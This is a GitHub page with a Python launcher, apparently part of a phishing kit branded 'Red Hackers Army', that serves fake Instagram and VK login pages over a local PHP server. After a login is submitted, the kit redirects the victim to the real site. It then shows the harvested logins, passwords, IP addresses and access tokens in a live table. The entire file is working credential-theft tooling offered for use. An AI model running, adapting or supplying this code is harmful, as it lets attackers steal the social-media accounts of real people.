-
Notifications
You must be signed in to change notification settings - Fork 0
/
fsh.py
125 lines (118 loc) · 3.67 KB
/
fsh.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
import os, sys, time
import random
from multiprocessing import Process
from time import sleep
from prettytable import PrettyTable
os.system('clear')
о = open('log.log', 'w')
о.close()
class A:
def __call__(self, count=10, sleep_time=0.5):
if used == "1":
os.system("cd instagram && php -S localhost:"+str(ports))
elif used == "2":
os.system("cd vk && php -S localhost:"+str(ports))
else:
print("No number '"+used+"'")
class B:
def __call__(self, count=10, sleep_time=0.5):
while True:
import os
x = PrettyTable()
x.field_names = ['Ceть', 'Логин', 'Пароль', 'Верно?', 'IP']
g=0
exec(open('log.log').read())
print(x)
time.sleep(1)
os.system("clear")
print("""
/|
/ |
/ |
/ |
/ ¿
/() ><>
/
\033[31m ____ __.__ ___________.__ .__ \033[0m
\033[31m | |/ _|__| _____ ____|_ _____/|__| _____| |__\033[0m
\033[33m |:::: < |::|/:::::| /:___||::::__) |::|/::___/::|::|\033[0m
\033[33m |::::|::||::|:::|::|/:/_/::>:::::| |::||___:||::Y::|\033[0m
\033[31m |____|__ |__|___| /|___ /|___ / |__/____ >___| /\033[0m
\033[31m |/ |//_____/ |/ |/ |/\033[32m 3.1\033[0m
\033[44m .::Aryan Mfc Github::. \033[0m
\033[44m | Red Hackers Army| \033[0m
""")
print("""
[0] History KF3
[1] Instagram
[2] VK
[3] Social master
[4] Exit
""")
used = input("Введите номер: ")
if used == "0":
try:
x = PrettyTable()
x.field_names = ['Ceть', 'Логин', 'Пароль', 'Верно?', 'IP', 'access_token']
exec(open('data.log').read())
print(x)
exit()
except:
exit()
elif used == "3":
os.system("python3 social.py")
exit()
elif used == '4':
os.system('clear')
print("""
\033[31m ____ __.__ ___________.__ .__ \033[0m
\033[31m | |/ _|__| _____ ____|_ _____/|__| _____| |__\033[0m
\033[33m |:::: < |::|/:::::| /:___||::::__) |::|/::___/::|::|\033[0m
\033[33m |::::|::||::|:::|::|/:/_/::>:::::| |::||___:||::Y::|\033[0m
\033[31m |____|__ |__|___| /|___ /|___ / |__/____ >___| /\033[0m
\033[31m |/ |//_____/ |/ |/ |/\033[0m
\033[44m .::Aryan-Mfc Github::. \033[0m
\033[44m | Red Hackers Army | \033[0m
>>> Bye!
""")
exit()
ports = input("Порт: ")
reloc = input("Редирект: ")
if reloc != "":
if used == "1":
f = open("instagram/location.location", 'w')
f.write(reloc)
f.close()
elif used == "2":
f = open("vk/location.location", 'w')
f.write(reloc)
f.close()
else:
pass
else:
if used == "1":
f = open("instagram/location.location", 'w')
f.write("https://instagram.com")
f.close()
elif used == "2":
f = open("vk/location.location", 'w')
f.write("https://vk.com")
f.close()
else:
f = open("vk/location.location", 'w')
f.write("https://google.com")
f.close()
f = open("instagram/location.location", 'w')
f.write("https://google.com")
f.close()
if ports == "":
ports=8080
if __name__ == '__main__':
a = A()
b = B()
p1 = Process(target=a, kwargs={'sleep_time': 0.7})
p2 = Process(target=b, args=(12,))
p1.start()
p2.start()
p1.join()
p2.join()